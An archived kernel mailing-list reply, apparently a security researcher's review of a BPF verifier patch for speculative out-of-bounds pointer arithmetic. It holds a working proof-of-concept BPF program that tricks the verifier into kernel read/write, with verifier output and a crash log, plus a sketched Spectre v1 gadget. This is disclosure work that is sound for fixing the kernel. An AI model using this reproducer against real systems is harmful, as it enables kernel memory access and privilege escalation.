lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 3 Jan 2019 22:13:44 +0100 From: Jann Horn <jannh@...gle.com> To: Daniel Borkmann <daniel@...earbox.net> Cc: Alexei Starovoitov <ast@...nel.org>, "David S. Miller" <davem@...emloft.net>, jakub.kicinski@...ronome.com, Network Development <netdev@...r.kernel.org> Subject: Re: [PATCH bpf v3 8/9] bpf: prevent out of bounds speculation on pointer arithmetic Hi! Sorry about the extremely slow reply, I was on vacation over the holidays and only got back today. On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@...earbox.net> wrote: > Jann reported that the original commit back in b2157399cc98 > ("bpf: prevent out-of-bounds speculation") was not sufficient > to stop CPU from speculating out of bounds memory access: > While b2157399cc98 only focussed on masking array map access > for unprivileged users for tail calls and data access such > that the user provided index gets sanitized from BPF program > and syscall side, there is still a more generic form affected > from BPF programs that applies to most maps that hold user > data in relation to dynamic map access when dealing with > unknown scalars or "slow" known scalars as access offset, for > example: [...] > +static int sanitize_ptr_alu(struct bpf_verifier_env *env, > + struct bpf_insn *insn, > + const struct bpf_reg_state *ptr_reg, > + struct bpf_reg_state *dst_reg, > + bool off_is_neg) > +{ [...] > + > + /* If we arrived here from different branches with different > + * limits to sanitize, then this won't work. > + */ > + if (aux->alu_state && > + (aux->alu_state != alu_state || > + aux->alu_limit != alu_limit)) > + return -EACCES; This code path doesn't get triggered in the case where the same ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg += reg". This leads to kernel read/write because the code intended to ensure safety of the "ptr += reg" case in speculative execution ends up clobbering the addend in the "numeric_reg += reg" case: source code: ============= int main(void) { int my_map = array_create(8, 30); array_set(my_map, 0, 1); struct bpf_insn insns[] = { // load map value pointer into r0 and r2 BPF_LD_MAP_FD(BPF_REG_ARG1, my_map), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16), BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0), BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), // load some number from the map into r1 BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0), // depending on R1, branch: BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3), // branch A BPF_MOV64_REG(BPF_REG_2, BPF_REG_0), BPF_MOV64_IMM(BPF_REG_3, 0), BPF_JMP_A(2), // branch B BPF_MOV64_IMM(BPF_REG_2, 0), BPF_MOV64_IMM(BPF_REG_3, 0x100000), // *** COMMON INSTRUCTION *** BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3), // depending on R1, branch: BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1), // branch A BPF_JMP_A(4), // branch B BPF_MOV64_IMM(BPF_REG_0, 0x13371337), // verifier-confused branch: verifier follows fall-through, runtime follows jump BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), // fake-dead code; targeted from branch A to prevent dead code sanitization BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN() }; int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns)); trigger_proc(sock_fd); } ============= verifier output: ============= 0: (18) r1 = 0x0 2: (bf) r2 = r10 3: (07) r2 += -16 4: (7a) *(u64 *)(r10 -16) = 0 5: (85) call bpf_map_lookup_elem#1 6: (55) if r0 != 0x0 goto pc+1 R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm 7: (95) exit from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm 8: (71) r1 = *(u8 *)(r0 +0) R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm 9: (55) if r1 != 0x0 goto pc+3 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm 10: (bf) r2 = r0 11: (b7) r3 = 0 12: (05) goto pc+2 15: (0f) r2 += r3 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm 16: (55) if r1 != 0x0 goto pc+1 17: (05) goto pc+4 22: (71) r0 = *(u8 *)(r0 +0) R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm 23: (b7) r0 = 0 24: (95) exit from 15 to 16 (speculative execution): safe from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1 fp-16=mmmmmmmm 13: (b7) r2 = 0 14: (b7) r3 = 1048576 15: (0f) r2 += r3 16: (55) if r1 != 0x0 goto pc+1 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm 17: (05) goto pc+4 22: safe from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576 R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm 18: (b7) r0 = 322376503 19: (55) if r2 != 0x100000 goto pc+2 20: (b7) r0 = 0 21: (95) exit processed 29 insns (limit 131072), stack depth 16 ============= dmesg: ============= [ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164 from=test pid=2185 [ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48 83 ed 28 48 [ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c 89 7d 18 31 [ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81 88 ff ff 48 [ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00 00 00 48 81 [ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e 73 0c 83 e0 [ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0 48 83 f8 00 [ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b 75 10 4c 8b [ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78 00 48 83 ff [ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6 ba 00 00 10 [ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09 d2 49 f7 da [ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02 [ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 [ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95 [ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337 [ 9948.481562] #PF error: [normal kernel read fault] [ 9948.483878] PGD 0 P4D 0 [ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN [ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225 [ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014 [ 9948.494912] RIP: 0010:0xffffffffc01602f3 [ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31 c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc cc cc [ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287 [ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848 [ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001 [ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002 [ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000 [ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000 [ 9948.525840] FS: 00007f2ad28ad700(0000) GS:ffff8881eb140000(0000) knlGS:0000000000000000 [ 9948.529708] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0 [ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 9948.542581] Call Trace: [ 9948.543760] ? sk_filter_trim_cap+0x148/0x2d0 [ 9948.545847] ? sk_reuseport_is_valid_access+0xa0/0xa0 [ 9948.548249] ? skb_copy_datagram_from_iter+0x6e/0x280 [ 9948.550655] ? _raw_spin_unlock+0x16/0x30 [ 9948.552581] ? deactivate_slab.isra.68+0x59d/0x600 [ 9948.554866] ? unix_scm_to_skb+0xd1/0x230 [ 9948.556780] ? unix_dgram_sendmsg+0x312/0x940 [ 9948.558856] ? unix_stream_connect+0x980/0x980 [ 9948.560986] ? aa_sk_perm+0x10c/0x3f0 [ 9948.563123] ? kasan_unpoison_shadow+0x35/0x40 [ 9948.565107] ? aa_af_perm+0x1e0/0x1e0 [ 9948.566608] ? kasan_unpoison_shadow+0x35/0x40 [ 9948.568463] ? unix_stream_connect+0x980/0x980 [ 9948.570397] ? sock_sendmsg+0x6d/0x80 [ 9948.571948] ? sock_write_iter+0x121/0x1c0 [ 9948.573678] ? sock_sendmsg+0x80/0x80 [ 9948.575258] ? sock_enable_timestamp+0x60/0x60 [ 9948.576958] ? iov_iter_init+0x86/0xc0 [ 9948.578395] ? __vfs_write+0x294/0x3b0 [ 9948.579782] ? kernel_read+0xa0/0xa0 [ 9948.581152] ? apparmor_task_setrlimit+0x330/0x330 [ 9948.582919] ? vfs_write+0xe7/0x230 [ 9948.584228] ? ksys_write+0xa1/0x120 [ 9948.585559] ? __ia32_sys_read+0x50/0x50 [ 9948.587174] ? do_syscall_64+0x73/0x160 [ 9948.588872] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq [ 9948.593654] CR2: 0000000013371337 [ 9948.595078] ---[ end trace cea5ab7027131bf2 ]--- ============= Aside from that, I also think that the pruning of "dead code" probably still permits v1 speculative execution attacks when code vaguely like the following is encountered, if it is possible to convince the CPU to mispredict the second branch, but I haven't tested that so far: R0 = <slow map value, known to be 0>; R1 = <fast map value>; if (R1 != R0) { // mispredicted return 0; } R3 = <a map value pointer>; R2 = <arbitrary 64-bit number>; if (R1 == 0) { // architecturally always taken, verifier prunes other branch R2 = <a map value pointer>; } access R3[R2[0] & 1]; To convince the CPU to predict the second branch the way you want, you could probably add another code path that jumps in front of the branch with both R2 and R3 already containing valid pointers. Something like this: if (<some map value>) { R0 = <slow map value, known to be 0>; R1 = <fast map value>; if (R1 != R0) { // mispredicted return 0; } R3 = <a map value pointer>; R2 = <arbitrary 64-bit number>;} else { R3 = <a map value pointer>; R2 = <arbitrary 64-bit number>; R1 = 1;} if (R1 == 0) { // architecturally always taken, verifier prunes other branch R2 = <a map value pointer>; } access R3[R2[0] & 1];
Powered by blists - more mailing lists